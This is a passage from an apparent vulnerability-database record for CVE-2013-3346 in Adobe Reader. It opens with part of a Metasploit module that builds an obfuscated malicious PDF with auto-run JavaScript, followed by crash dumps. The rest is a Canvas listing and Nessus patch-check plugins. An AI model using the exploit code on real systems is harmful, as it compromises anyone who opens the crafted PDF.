app.addToolButton({\n cName: \"evil\",\n cExec: \"1\",\n cEnable: \"addButtonFunc();\"\n });\n}\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(js)\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(4) << eol\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(6) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(3) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(5)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(5) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(6)\n pdf << n_obfu(\"<</XFA \") << io_ref(7) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll / icucnv40.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n\n\n=begin\n\n* crash Adobe Reader 10.1.4\n\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\n\n* crash Adobe Reader 11.0.2\n\n(940.d70): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\n\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_toolbutton.rb"}], "canvas": [{"lastseen": "2019-05-29T19:48:21", "bulletinFamily": "exploit", "description": "**Name**| acrobat_toolbutton \n---|--- \n**CVE**| CVE-2013-3346 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| acrobat_toolbutton \n**Notes**| CVE Name: CVE-2013-3346 \nVENDOR: Adobe \nNOTES: \nThis exploit has been tested on: \n \n\\- Windows XP SP3 EN Acrobat Reader 11.0.2/11.0.1/10.1.4/10.1.2/10.1.1/10.1.0 \n \nVulnerable versions include: \n \n<= 11.0.2 \n<= 10.1.6 \n<= 9.5.4 \n \nRepeatability: \nReferences: http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html \nCVE Url: http://www.adobe.com/support/security/bulletins/apsb13-15.html \n\n", "modified": "2013-08-30T20:55:00", "published": "2013-08-30T20:55:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_toolbutton", "id": "ACROBAT_TOOLBUTTON", "type": "canvas", "title": "Immunity Canvas: ACROBAT_TOOLBUTTON", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:40:27", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201309-10\n(Adobe Reader: Arbitrary Code Execution)\n\n An unspecified vulnerability exists in Adobe Reader.\n \nImpact :\n\n An attacker could execute arbitrary code or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201309-10.NASL", "href": "https://www.tenable.com/plugins/nessus/69901", "published": "2013-09-15T00:00:00", "title": "GLSA-201309-10 : Adobe Reader: Arbitrary Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201309-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69901);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2013-3346\");\n script_bugtraq_id(62149);\n script_xref(name:\"GLSA\", value:\"201309-10\");\n\n script_name(english:\"GLSA-201309-10 : Adobe Reader: Arbitrary Code Execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201309-10\n(Adobe Reader: Arbitrary Code Execution)\n\n An unspecified vulnerability exists in Adobe Reader.\n \nImpact :\n\n An attacker could execute arbitrary code or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201309-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.5.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 9.5.5\"), vulnerable:make_list(\"lt 9.5.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:43", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws\nare detailed in the Adobe Security bulletin APSB13-15, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2013-2549, CVE-2013-2718,\nCVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722,\nCVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726,\nCVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731,\nCVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735,\nCVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\nCVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2013-0826.NASL", "href": "https://www.tenable.com/plugins/nessus/66458", "published": "2013-05-16T00:00:00", "title": "RHEL 5 / 6 : acroread (RHSA-2013:0826)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0826. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66458);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/10/24 15:35:37\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3346\");\n script_bugtraq_id(58398, 59851);\n script_xref(name:\"RHSA\", value:\"2013:0826\");\n\n script_name(english:\"RHEL 5 / 6 : acroread (RHSA-2013:0826)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws\nare detailed in the Adobe Security bulletin APSB13-15, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2013-2549, CVE-2013-2718,\nCVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722,\nCVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726,\nCVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731,\nCVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735,\nCVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\nCVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb13-15.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb13-15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2731\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2724\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2723\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3346\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0826\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-9.5.5-1.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-plugin-9.5.5-1.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-9.5.5-1.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-plugin-9.5.5-1.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:12:12", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader", "modified": "2019-11-02T00:00:00", "id": "ADOBE_ACROBAT_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/nessus/66409", "published": "2013-05-14T00:00:00", "title": "Adobe Acrobat < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66409);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n\n script_name(english:\"Adobe Acrobat < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a\n JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could\n lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could\n lead to code execution. (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that\n have been blacklisted in the operating system.\n (CVE-2013-3342)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 